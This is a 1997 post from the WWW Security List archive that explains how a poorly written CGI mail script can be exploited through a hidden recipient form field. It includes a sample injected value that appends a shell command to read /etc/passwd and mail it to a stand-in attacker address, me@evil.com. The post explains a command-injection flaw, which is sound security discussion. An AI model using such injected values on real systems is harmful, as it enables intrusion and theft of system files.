[4068] in WWW Security List Archive
Re: E-mail
daemon@ATHENA.MIT.EDU (Murple)
Sat Jan 25 13:50:25 1997
From: Murple <btherl@ariel.ucs.unimelb.edu.au>
To: www-security@ns2.rutgers.edu
Date: Sun, 26 Jan 1997 02:37:06 +1100 (EST)
Errors-To: owner-www-security@ns2.rutgers.edu
> >I'd like to know if this program exists...
> >It's a program that u send an e-mail to someone...then.. it bring me back
> >the passwd file... I'd like to know this...
> >By xande
>
> it is bullshit unless the email contain a executable and you are dumb enough
> to run it....
Maybe he means this all too common bug:
<form method="Get" action="http://www.unaware.com/cgi-bin/mail.pl">
<input type=hidden name="recipient" value="blithely@unaware.com">
...
where, given a badly enough written mailing script, tacking a ';' onto the
end of the email address will let you execute arbitrary commands, eg
"blithely@unaware.com ; cat /etc/passwd | mail me@evil.com ;"
which will work if the mail command is executed by a shell, and the recipient
is passed unescaped as an argument.
